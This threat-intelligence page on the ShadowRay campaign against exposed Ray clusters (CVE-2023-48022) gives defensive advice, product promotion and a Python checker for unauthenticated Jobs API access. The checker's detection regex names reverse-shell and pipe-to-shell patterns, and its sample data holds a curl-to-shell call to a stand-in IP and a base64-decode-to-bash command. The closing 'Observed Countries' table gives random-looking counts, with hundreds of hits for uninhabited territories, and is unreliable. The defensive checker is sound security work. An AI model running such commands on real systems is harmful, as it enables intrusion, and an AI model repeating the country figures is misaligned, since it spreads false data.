Unveiling the ShadowRay Campaign: Exploiting Critical Ray Framework Vulnerabilities to Target and Compromise AI Workloads Globally


Since September 5, 2023, the ShadowRay campaign, run by as yet unidentified threat actors, has been exploiting CVE-2023-48022 in the Ray framework to seize compute resources and data in the Education, Cryptocurrency and Biopharma sectors. The flaw is disputed: Ray's Jobs API accepts job submissions without authentication by design, Anyscale considers this intended behaviour for a framework meant to run inside a trusted network, and no patch was issued, which is why exposed instances stayed exploitable. Ray, developed by Anyscale, is a widely used framework for scaling AI and Python applications at companies such as Amazon and OpenAI; its repository has more than 30,500 stars on GitHub, which gives a sense of how broadly the exposed component is deployed. Researchers found that hundreds of Internet-exposed Ray servers were compromised through CVE-2023-48022, giving attackers access to sensitive information such as AI models, environment variables and production database credentials.

Indicators of Compromise

fintagixgamesatgmail.com

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATIONS

Defense against ShadowRay

Researchers say they have alerted many companies that were breached using the Ray bug and provided assistance with remediation.


To secure Ray deployments, run them only inside a trusted network: enforce firewall rules, put authorization in front of the Ray Dashboard port (8265 by default), and continuously monitor the cluster for anomalies.


Additionally, avoid permissive settings such as binding the dashboard to 0.0.0.0 (common in container and Kubernetes deployments) unless network access to the port is restricted, and leverage tools that improve the security posture of the cluster.
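As an added example (not code from Oligo, Anyscale or SOCRadar), the following Python script checks the exposure described in the two points above from an attacker's position: whether the Ray Dashboard's Jobs REST API (GET /api/jobs/ on the default port 8265) answers without any credentials and, if it does, whether any submitted job entrypoint looks like the download-and-execute, payload-decoding or miner commands an intruder would submit. It assumes a Ray 2.x dashboard whose Jobs API returns a JSON list of job records (older releases returned an object keyed by job id, which is also handled). The entrypoint patterns are a heuristic chosen for this illustration, not indicators from the campaign report, and the sample Jobs API response is constructed.

```python
"""Check a Ray Dashboard for the ShadowRay exposure from the outside.

Added example, not code from Oligo, Anyscale or SOCRadar. Assumes a Ray 2.x
dashboard on its default port 8265 whose Jobs REST API answers GET /api/jobs/
with a JSON list of job records. If that call succeeds without credentials,
anyone who can reach the port can submit code: the CVE-2023-48022 condition.
"""
import json
import re
import sys
import urllib.error
import urllib.request

RAY_DASHBOARD_PORT = 8265  # Ray's default dashboard port

# Heuristic chosen for this example, not indicators from the campaign report:
# entrypoints that download-and-pipe to a shell, decode an embedded blob,
# open a reverse shell or start a known miner binary.
SUSPICIOUS_ENTRYPOINT = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh"   # fetch remote script, pipe to shell
    r"|base64\s+(-d|--decode)"       # decode embedded payload
    r"|/dev/tcp/"                    # bash reverse shell
    r"|\bnc\b.*\s-e\b"               # netcat with -e
    r"|xmrig|minerd"                 # common miner names
)


def probe(host, port=RAY_DASHBOARD_PORT, timeout=3.0):
    """GET /api/jobs/ on the dashboard; (status, body), status None if unreachable."""
    url = f"http://{host}:{port}/api/jobs/"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def job_records(parsed):
    """Normalise a Jobs API payload to a list of job dicts; None if it is not one."""
    if isinstance(parsed, list):
        records = parsed
    elif isinstance(parsed, dict):
        records = list(parsed.values())  # older releases: object keyed by job id
    else:
        return None
    return records if all(isinstance(r, dict) for r in records) else None


def classify(status, body):
    """exposed / protected / unreachable / not_ray for one GET /api/jobs/ answer."""
    if status is None:
        return "unreachable"
    if status in (401, 403):
        return "protected"   # an auth proxy or gateway is in front
    if status != 200:
        return "not_ray"
    try:
        parsed = json.loads(body)
    except ValueError:
        return "not_ray"     # HTML or other non-JSON answer on the port
    return "exposed" if job_records(parsed) is not None else "not_ray"


def suspicious_jobs(jobs):
    """Submission ids of jobs whose entrypoint matches the heuristic."""
    return [job.get("submission_id", "<unknown>") for job in jobs
            if SUSPICIOUS_ENTRYPOINT.search(job.get("entrypoint", ""))]


def assess(status, body):
    """Combine the exposure verdict with the entrypoint heuristic."""
    verdict = classify(status, body)
    if verdict != "exposed":
        return verdict, []
    return verdict, suspicious_jobs(job_records(json.loads(body)))


# Constructed sample response, not captured from any real cluster.
SAMPLE_JOBS_BODY = json.dumps([
    {"submission_id": "raysubmit_A1", "status": "SUCCEEDED",
     "entrypoint": "python train.py --epochs 3"},
    {"submission_id": "raysubmit_B2", "status": "RUNNING",
     "entrypoint": "curl -s http://198.51.100.7/x.sh | sh"},
    {"submission_id": "raysubmit_C3", "status": "RUNNING",
     "entrypoint": "echo aGk= | base64 -d | bash"},
])

if __name__ == "__main__":
    if len(sys.argv) > 1:   # live: python ray_exposure_check.py HOST [PORT]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else RAY_DASHBOARD_PORT
        print(assess(*probe(sys.argv[1], port)))
    else:                   # offline demo on the constructed sample
        print(assess(200, SAMPLE_JOBS_BODY))
```

Run it from a network position that should not be able to reach the cluster (the Internet, a tenant VPC, a developer laptop); a verdict of exposed means anyone in that position can submit arbitrary code to the head node, regardless of what the firewall rules were meant to allow. A protected verdict only means something in front of the dashboard answered 401 or 403; it says nothing about how strong that authentication is. With no arguments the script runs against the constructed sample.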


You can leverage SOCRadar's modules to secure Ray deployments against threats such as the ShadowRay campaign, following the risk mitigation strategies outlined above. Within SOCRadar's suite of cybersecurity tools, the modules best suited to these strategies include:


Cyber Threat Intelligence Platform: To continuously monitor new threats, vulnerabilities such as CVE-2023-48022, and Ray-related updates. This module can help you understand the threat landscape and prepare for potential cyberespionage campaigns targeting Ray deployments.


Digital Risk Protection (DRP): Scanning and monitoring digital assets to detect misconfigurations, compromised services, and unauthorized access attempts. This module can help identify exposed Ray instances or unauthorized access attempts to the Ray Dashboard port.


Secure Access Service Edge (SASE) or Firewall Management: Prevents unauthorized access to Ray deployments by managing firewall rules and security groups consistently. This is crucial for enforcing network security policies and restricting access to the Ray environment to trusted sources only.


Vulnerability Detection: While code scanning and misconfiguration tools may not detect attacks that exploit Ray's design (the unauthenticated Jobs API is intended behaviour, not a coding defect), a vulnerability management tool can still play a critical role in identifying other weaknesses in the environment that could be chained with the Ray exposure.


Identity and Access Management (IAM): To add layers of authorization, especially if you are exposing the Ray Dashboard or its API over the network. This module manages access controls, ensuring that only authorized users can interact with the Ray environment.


Extended Threat Intelligence (XTI): Continuously monitors production environments and AI clusters for anomalies, such as unusual network traffic patterns or unexpected behaviour indicative of abuse or unauthorized activity on Ray (for example, job submissions from unfamiliar sources or unexplained GPU and CPU load).


Incident Response: For automating responses to detected threats and managing incident response efforts efficiently. Following a documented incident response plan is key to handling any security incident quickly.


Given how Ray works, with a job submission interface that is remote code execution by design, and the particular challenges of securing it, combining these SOCRadar modules and services provides a comprehensive approach to mitigating the risks associated with the ShadowRay campaign and similar threats.


Observed Countries (250)

AD (737)
AE (450)
AF (257)
AG (56)
AI (945)
AL (406)
AM (33)
AO (453)
AQ (954)
AR (383)
AS (71)
AT (223)
AU (804)
AW (144)
AX (170)
AZ (919)
BA (896)
BB (752)
BD (819)
BE (922)
BF (494)
BG (175)
BH (332)
BI (174)
BJ (7)
BL (350)
BM (906)
BN (372)
BO (264)
BQ (118)
BR (529)
BS (63)
BT (23)
BV (276)
BW (661)
BY (725)
BZ (356)
CA (798)
CC (31)
CD (359)
CF (726)
CG (309)
CH (621)
CI (980)
CK (660)
CL (487)
CM (541)
CN (859)
CO (373)
CR (220)
CU (216)
CV (261)
CW (874)
CX (535)
CY (594)
CZ (876)
DE (698)
DJ (17)
DK (677)
DM (401)
DO (417)
DZ (574)
EC (171)
EE (177)
EG (559)
EH (65)
ER (133)
ES (616)
ET (727)
FI (168)
FJ (216)
FK (641)
FM (698)
FO (684)
FR (619)
GA (894)
GB (919)
GD (409)
GE (85)
GF (925)
GG (985)
GH (179)
GI (235)
GL (63)
GM (409)
GN (925)
GP (651)
GQ (473)
GR (56)
GS (267)
GT (353)
GU (771)
GW (252)
GY (900)
HK (29)
HM (992)
HN (214)
HR (890)
HT (555)
HU (448)
ID (760)
IE (965)
IL (105)
IM (140)
IN (797)
IO (608)
IQ (862)
IR (779)
IS (452)
IT (52)
JE (734)
JM (345)
JO (723)
JP (861)
KE (170)
KG (928)
KH (83)
KI (279)
KM (499)
KN (865)
KP (745)
KR (640)
KW (136)
KY (512)
KZ (371)
LA (817)
LB (925)
LC (407)
LI (395)
LK (137)
LR (412)
LS (384)
LT (77)
LU (280)
LV (632)
LY (55)
MA (499)
MC (36)
MD (867)
ME (442)
MF (469)
MG (807)
MH (705)
MK (93)
ML (350)
MM (895)
MN (822)
MO (834)
MP (107)
MQ (156)
MR (1)
MS (934)
MT (664)
MU (432)
MV (317)
MW (152)
MX (916)
MY (918)
MZ (98)
NA (126)
NC (665)
NE (596)
NF (179)
NG (997)
NI (528)
NL (160)
NO (956)
NP (870)
NR (153)
NU (828)
NZ (445)
OM (36)
PA (629)
PE (183)
PF (99)
PG (302)
PH (957)
PK (797)
PL (168)
PM (218)
PN (672)
PR (420)
PS (240)
PT (256)
PW (107)
PY (958)
QA (5)
RE (270)
RO (21)
RS (280)
RU (492)
RW (329)
SA (1)
SB (610)
SC (178)
SD (836)
SE (29)
SG (626)
SH (573)
SI (584)
SJ (320)
SK (585)
SL (582)
SM (248)
SN (466)
SO (899)
SR (536)
SS (657)
ST (132)
SV (699)
SX (77)
SY (750)
SZ (348)
TC (363)
TD (130)
TF (894)
TG (12)
TH (156)
TJ (448)
TK (157)
TL (739)
TM (466)
TN (586)
TO (883)
TR (195)
TT (248)
TV (776)
TW (466)
TZ (906)
UA (753)
UG (119)
UM (105)
US (216)
UY (870)
UZ (742)
VA (298)
VC (731)
VE (726)
VG (920)
VI (520)
VN (454)
VU (985)
WF (608)
WS (610)
XK (179)
YE (45)
YT (745)
ZA (660)
ZM (279)
ZW (337)